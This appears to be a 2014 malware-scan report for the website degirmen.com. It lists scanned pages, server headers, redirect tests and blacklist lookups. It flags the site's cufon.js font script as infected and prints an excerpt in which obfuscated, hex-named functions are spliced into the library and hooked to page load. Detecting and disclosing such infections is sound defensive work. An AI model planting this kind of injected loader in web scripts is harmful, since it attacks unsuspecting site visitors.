Scanned pages/files
Request | Server response | Status |
http://www.degirmen.com/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 16 May 2014 18:05:17 GMT Pragma: no-cache Location: tr/ Server: nginx Content-Length: 1 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=b95ae169c92b082d7cbeafb5650bfafd; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.degirmen.com/tr/ | 200 OK Content-Length: 162890 Content-Type: text/html | clean |
http://www.degirmen.com/tr/../js/cufon.js | 200 OK Content-Length: 22389 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&& if (window.addEventListener) window.addEventListener('load', pd5ff5e8e2215535, false); else if (window.attachEvent) window.attachEvent('onload', pd5ff5e8e2215535); else { var e533edd91198ea4 = window.onload ; window.onload = function() { if(e533edd91198ea4) { e533edd91198ea4(); } pd5ff5e8e2215535(); } } } w0f7abfc8cd028d(n5b85aa8e53b);
Antivirus reports:
http://www.degirmen.com/../js/font.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/test404page.js | HTTP/1.1 302 Found Cache-Control: max-age=2592000 Connection: close Date: Fri, 16 May 2014 18:05:19 GMT Location: http://www.degirmen.com/error404.html Server: nginx Content-Length: 221 Content-Type: text/html; charset=iso-8859-1 Expires: Sun, 15 Jun 2014 18:05:19 GMT | clean |
http://www.degirmen.com/error404.html | 200 OK Content-Length: 317 Content-Type: text/html | clean |
http://www.degirmen.com/../js/jquery-1.3.2.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/../js/jquery.easing.1.3.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/../js/easySlider1.7.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
http://www.degirmen.com/../Scripts/swfobject_modified.js | 400 Bad Request Content-Length: 166 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: degirmen.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: degirmen.com
Referer: http://www.google.com/search?q=degirmen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=degirmen.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://degirmen.com/
Result: degirmen.com is not infected or malware details are not published yet.